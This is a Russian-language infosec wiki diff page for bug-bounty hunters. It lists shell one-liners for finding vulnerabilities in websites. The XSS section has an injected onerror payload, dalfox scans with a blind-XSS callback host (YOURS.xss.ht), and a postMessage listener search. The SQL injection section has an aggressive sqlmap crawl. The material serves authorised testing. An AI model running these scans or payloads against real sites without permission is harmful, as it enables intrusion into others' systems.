Bugbounty — различия между версиями

Материал из InformationSecurity WIKI
Перейти к: навигация, поиск
м
м
Строка 1: Строка 1:
 
На странице будут однострочники, позволяющие быстро проверить вебсайт на конкретные уязвимости
 
На странице будут однострочники, позволяющие быстро проверить вебсайт на конкретные уязвимости
  
 +
= Уязвимости =
  
 +
== XSS ==
 +
<syntaxhighlight lang="powershell" line="1" enclose="div" style="overflow-x:scroll" >
 +
echo http://testphp.vulnweb.com | waybackurls | gf xss | qsreplace '"><img src=x onerror=alert(1);>' | freq
 +
 +
gospider -S URLS.txt -c 10 -d 5 --blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt)" --other-source | grep -e "code-200" | awk '{print $5}'| grep "=" | qsreplace -a | dalfox pipe | tee OUT.txt
 +
 +
waybackurls HOST | gf xss | sed 's/=.*/=/' | sort -u | tee FILE.txt && cat FILE.txt | dalfox -b YOURS.xss.ht pipe > OUT.txt
 +
 +
cat HOSTS.txt | getJS | httpx --match-regex "addEventListener\((?:'|\")message(?:'|\")"
 +
 +
</syntaxhighlight>
  
echo http://testphp.vulnweb.com | waybackurls | gf xss | qsreplace '"><img src=x onerror=alert(1);>' | freq
+
== SQL injection ==
  
 
<syntaxhighlight lang="powershell" line="1" enclose="div" style="overflow-x:scroll" >
 
<syntaxhighlight lang="powershell" line="1" enclose="div" style="overflow-x:scroll" >
echo http://testphp.vulnweb.com | waybackurls | gf xss | qsreplace '"><img src=x onerror=alert(1);>' | freq
+
python sqlmap.py -u http://example.com --forms --batch --crawl=10 --cookie=jsessionid=12345 --level=5 --risk=3
 
</syntaxhighlight>
 
</syntaxhighlight>
 +
 +
== Backups ==

Версия 12:13, 20 марта 2022

На странице будут однострочники, позволяющие быстро проверить вебсайт на конкретные уязвимости

Уязвимости

XSS

1 echo http://testphp.vulnweb.com | waybackurls | gf xss | qsreplace '"><img src=x onerror=alert(1);>' | freq
2 
3 gospider -S URLS.txt -c 10 -d 5 --blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt)" --other-source | grep -e "code-200" | awk '{print $5}'| grep "=" | qsreplace -a | dalfox pipe | tee OUT.txt
4 
5 waybackurls HOST | gf xss | sed 's/=.*/=/' | sort -u | tee FILE.txt && cat FILE.txt | dalfox -b YOURS.xss.ht pipe > OUT.txt
6 
7 cat HOSTS.txt | getJS | httpx --match-regex "addEventListener\((?:'|\")message(?:'|\")"

SQL injection

1 python sqlmap.py -u http://example.com --forms --batch --crawl=10 --cookie=jsessionid=12345 --level=5 --risk=3

Backups